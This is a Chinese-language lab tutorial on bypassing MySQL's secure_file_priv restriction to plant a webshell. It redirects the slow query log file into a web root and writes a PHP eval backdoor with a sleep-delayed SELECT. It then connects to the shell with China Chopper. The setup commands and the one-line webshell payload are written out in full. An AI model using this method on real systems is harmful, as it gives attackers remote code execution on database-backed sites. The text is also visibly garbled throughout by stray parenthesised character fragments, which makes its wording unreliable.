目標(biāo)IP地址：192.168.106.130

本地IP地址：192.168.106.1

訪(fǎng)問(wèn)目標(biāo)網(wǎng)絡(luò)如下圖所示：

實(shí)驗(yàn)場(chǎng)景

某些情況下，當(dāng)我們進(jìn)入網(wǎng)站phpmyadmin或者網(wǎng)站后臺(tái)執(zhí)行SQL命令，計(jì)劃通過(guò)select into outfile寫(xiě)一句話(huà)木馬（shell），但是通常都會(huì)報(bào)錯(cuò)

如下圖所示：

原因

在mysql 中 secure_file_priv的值默認(rèn)為NULL。

并且無(wú)法用sql語(yǔ)句對(duì)其進(jìn)行修改，只能夠通過(guò)以下方式修改

windows：

修改mysql.ini 文件，在[mysqld] 下添加條目: secure_file_priv =

保存，重啟mysql。

Linux：

在/etc/my.cnf的[mysqld]下面添加local-infile=0選項(xiàng)。

secure_file_priv作用：

• secure_file_priv為null 表示不允許導(dǎo)入導(dǎo)出
• secure_file_priv指定文件夾時(shí)，表示mysql的導(dǎo)入導(dǎo)出只能發(fā)生在指定的文件夾
• secure_file_priv沒(méi)有設(shè)置時(shí)，則表示沒(méi)有任何限制

但是如果這樣的話(huà)我們就不能夠?qū)憇hell了嗎？答案是否定的。

突破限制利用方法：日志的利用

利用方法：

攻擊時(shí)進(jìn)行一次附帶代碼的url請(qǐng)求，在日志記錄這次請(qǐng)求之后，通過(guò)文件包含漏洞來(lái)包含這個(gè)日志文件，從而執(zhí)行請(qǐng)求中的代碼。

mysql也具有日志，我們也可以通過(guò)日志來(lái)getshell。

mysql日志主要包含:錯(cuò)誤日志、查詢(xún)?nèi)罩?、慢查?xún)?nèi)罩?、事?wù)日志，日志的詳細(xì)情況參考mysql日志詳細(xì)解析

本次實(shí)驗(yàn)主要利用慢查詢(xún)?nèi)罩緦?xiě)shell

第一步：

1.設(shè)置slow_query_log=1.即啟用慢查詢(xún)?nèi)罩?默認(rèn)禁用)。

分析：

slow_query_log=ON 已開(kāi)啟

第二步：

修改slow_query_log_file日志文件的絕對(duì)路徑以及文件名

作為攻擊者不知道安裝路徑，可以輸入：show variables like “%char%”，執(zhí)行效果如下圖所示，得到安裝路徑

修改slow_query_log_file日志文件的絕對(duì)路徑以及文件名為C:\phpstudy\PHPTutorial\WWW\shell.php

set global slow_query_log_file=‘C:\phpstudy\PHPTutorial\WWW\shell.php’

目標(biāo)靶機(jī)驗(yàn)證是否成功修改：

第三步：

向日志文件寫(xiě)入shell，select ‘<?php @eval($_POST[x]);?>’ or sleep(11)

因?yàn)閟leep(11)，SQL語(yǔ)句正確的話(huà)，會(huì)延遲11秒后返回執(zhí)行結(jié)果，耐心等待即可

第四步：

訪(fǎng)問(wèn)shell.php日志文件

第五步：

中國(guó)菜刀連接

連接成功

總結(jié)

以上為個(gè)人經(jīng)驗(yàn)，希望能給大家一個(gè)參考，也希望大家多多支持腳本之家。

最新評(píng)論